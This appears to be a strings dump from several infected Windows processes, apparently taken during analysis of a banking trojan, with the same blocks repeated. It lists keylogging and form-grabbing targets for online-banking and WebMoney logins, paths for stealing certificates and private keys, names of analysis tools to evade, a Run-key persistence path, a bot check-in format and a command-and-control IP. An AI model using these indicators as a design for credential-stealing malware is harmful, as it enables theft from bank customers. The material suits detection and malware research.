CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Dwm.exe_1376_rwx_00860000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Explorer.EXE_1440_rwx_03ED0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Explorer.EXE_1440_rwx_047C0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1732_rwx_003E0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

